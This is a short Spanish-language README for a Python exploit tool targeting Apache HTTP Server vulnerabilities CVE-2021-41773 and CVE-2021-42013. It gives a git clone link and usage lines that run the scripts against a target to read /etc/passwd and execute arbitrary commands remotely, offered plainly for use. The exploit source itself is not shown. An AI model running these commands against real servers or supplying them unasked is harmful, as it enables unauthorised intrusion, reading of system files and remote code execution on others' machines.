
Exploit creado en python3 para explotar vulnerabilidades conocidas en el servidor web Apache (CVE-2021-41773, CVE-2021-42013)
Exploit creado en python3 para explotar vulnerabilidades conocidas en el servidor web Apache (CVE-2021-41773, CVE-2021-42013)
El Proyecto Apache HTTP Server es un esfuerzo para desarrollar y mantener un servidor HTTP de código abierto para sistemas operativos modernos, incluyendo UNIX y Windows. El objetivo de este proyecto es proporcionar un servidor seguro, eficiente y extensible que brinde servicios HTTP en sintonía con los estándares HTTP actuales.
Simplemente haz un git clone:
git clone https://github.com/0xGabe/Apache-CVEs
Para leer el archivo deseado, simplemente pasa la ruta del archivo. Si el usuario no tiene permiso de lectura, no se producirá ningún resultado de lectura.
python3 cve-2021-41773.py --url http://HOST:PORT --path /etc/passwd
Para ejecutar comandos con espacios, caracteres especiales o similares en la máquina objetivo, es necesario pasar el comando entre comillas.
python3 cve-2021-41773.py --url http://HOST:PORT --cmd id
Para leer el archivo deseado, simplemente pasa la ruta del archivo. Si el usuario no tiene permiso de lectura, no se producirá ningún resultado de lectura.
python3 cve-2021-42013.py --url http://HOST:PORT --path /etc/passwd
Para ejecutar comandos con espacios, caracteres especiales o similares en la máquina objetivo, es necesario pasar el comando entre comillas.
python3 cve-2021-42013.py --url http://HOST:PORT --cmd id